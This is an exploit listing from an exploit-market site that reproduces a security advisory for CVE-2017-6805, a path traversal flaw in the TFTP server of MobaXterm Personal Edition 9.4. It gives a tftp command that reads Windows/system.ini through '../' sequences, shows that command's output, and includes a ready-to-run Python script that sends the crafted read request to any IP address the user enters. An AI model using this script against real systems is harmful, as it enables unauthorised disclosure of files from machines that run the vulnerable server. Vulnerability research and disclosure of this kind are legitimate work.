[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MobaXterm Personal Edition 9.4 - Directory Traversal Vulnerability

Author
hyp3rlinx
Risk
[
Security Risk High
]
0day-ID
0day-ID-27294
Category
remote exploits
Date add
11-03-2017
CVE
CVE-2017-6805
Platform
windows
[+] Credits: John Page AKA hyp3rlinx    
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/MOBAXTERM-TFTP-PATH-TRAVERSAL-REMOTE-FILE-ACCESS.txt
[+] ISR: ApparitionSec            
  
 
 
Vendor:
=====================
mobaxterm.mobatek.net
 
 
 
Product:
===============================
MobaXterm Personal Edition v9.4
 
Enhanced terminal for Windows with X11 server, tabbed SSH client, network tools and much more.
 
 
 
Vulnerability Type:
=====================================
Path Traversal Remote File Disclosure
 
 
 
 
CVE Reference:
==============
CVE-2017-6805
 
 
 
Security Issue:
================
Remote attackers can use UDP socket connection to TFTP server port 69 and send Read request, to retrieve otherwise protected files using
directory traversal attacks e.g.  ../../../../Windows/system.ini
 
Start MobaXterm TFTP server which listens on default TFTP port 69.
 
c:\>tftp -i 127.0.0.1 GET ../../../../Windows/system.ini
Transfer successful: 219 bytes in 1 second(s), 219 bytes/s
 
c:\xampp\htdocs>type system.ini
; for 16-bit app support
[386Enh]
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON
 
[drivers]
wave=mmdrv.dll
timer=timer.drv
 
[mci]
 
Victim Data located on: 127.0.0.1
 
 
 
POC URL:
=============================
https://vimeo.com/207516364
 
 
 
 
Exploit:
==========
 
import sys,socket
 
print 'MobaXterm TFTP Directory Traversal 0day Exploit'
print 'Read Windows/system.ini'
print 'hyp3rlinx \n'
 
HOST = raw_input("[IP]>")
FILE = 'Windows/system.ini' 
PORT = 69                                        
  
PAYLOAD = "\x00\x01"                                #TFTP Read 
PAYLOAD += "../" * 4 + FILE + "\x00"                #Read system.ini using directory traversal
PAYLOAD += "netascii\x00"                           #TFTP Type
  
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(PAYLOAD, (HOST, PORT))
out = s.recv(1024)
s.close()
 
print "Victim Data located on : %s " %(HOST)
print out.strip()

#  0day.today [2024-12-25]  #